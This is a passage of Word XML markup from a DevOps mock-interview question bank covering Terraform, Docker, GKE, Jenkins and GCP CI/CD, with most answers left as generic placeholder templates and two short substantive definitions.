        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What is the purpose of the Docker provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Terraform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Terraform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purpose of the Docker provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. What is the difference between a Docker image and a Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Docker image is the read-only, immutable template (filesystem layers plus metadata) built from a Dockerfile; a container is a running (or stopped) instance of that image with its own writable layer, network, and process space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Why do we expose ports for a Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Networking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Why do we expose ports for a Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. What is the difference between internal and external ports?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Networking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internal and external ports?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How do you run an Nginx container using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Hands-On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run an Nginx container using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. What happens if the required provider version is incorrect?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Versioning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Versioning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happens if the required provider version is incorrect?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. Explain when you would use terraform init, terraform validate, terraform fmt, terraform plan, terraform apply, and terraform destroy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Commands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when you would use terraform init, terraform validate, terraform fmt, terraform plan, terraform apply, and terraform destroy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. What is Infrastructure as Code (IaC)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Infrastructure as Code is the practice of defining and managing infrastructure (servers, networks, databases) through versioned, declarative configuration files instead of manual console clicks, making infrastructure repeatable, reviewable, and auditable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. Why do we use Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Basics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Why do we use Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. What are providers in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Basics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providers in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. What are resources in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Basics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resources in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. What is the Terraform state file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/State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Terraform state file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. What is the purpose of required_providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Providers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Providers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purpose of required_providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. Explain resource dependencies in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Dependencies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resource dependencies in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. What is the difference between terraform validate and terraform plan?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Commands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terraform validate and terraform plan?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. How do you pin a provider version?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Versioning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Versioning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pin a provider version?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. How would you deploy a Docker container using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Hands-On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deploy a Docker container using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 70 - GCP DevOps and GKE Screening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Your profile looks more DevOps-focused. What have you done specifically in DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the DevOps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Your profile looks more DevOps-focused. What have you done specifically in DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. In the DevOps area, what exactly are you trying to do? What are your day-to-day responsibilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the DevOps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In the DevOps area, what exactly are you trying to do? What are your day-to-day responsibilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Which cloud platform are you strongest in: GCP, AWS, or Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud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cloud platform are you strongest in: GCP, AWS, or Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What are the last three major DevOps tasks or projects you have done in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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the last three major DevOps tasks or projects you have done in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are the key GCP services you have used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the 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the key GCP services you have used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What is the difference between GKE Standard Mode and Autopilot Mode?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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GKE Standard Mode and Autopilot Mode?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Can you explain the GKE architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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Can you explain the GKE architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you secure a GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Security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secure a GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Have you used Jenkins CI/CD pipelines with Bitbucket?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Jenkins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used Jenkins CI/CD pipelines with Bitbucket?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is the CI workflow in Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Jenkins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CI workflow in Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you design a CI/CD pipeline in GCP? Explain the complete flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GCP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design a CI/CD pipeline in GCP? Explain the complete flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Would you use Cloud Source Repositories or an external Git repository such as GitHub, Bitbucket, or GitLab in your pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Git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Would you use Cloud Source Repositories or an external Git repository such as GitHub, Bitbucket, or GitLab in your pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Do you have experience implementing GCP with EDM, Salesforce, or any data platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Data Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Data Platform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 you have experience implementing GCP with EDM, Salesforce, or any data platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Do you have experience with Liquibase or database migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Database Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Database Migration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 you have experience with Liquibase or database migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Do you have real-time experience with containerization technologies like Docker and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Containers/Kubernetes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 you have real-time experience with containerization technologies like Docker and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Can you explain a real project where you containerized and deployed an application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Containers/Kubernetes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Can you explain a real project where you containerized and deployed an application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
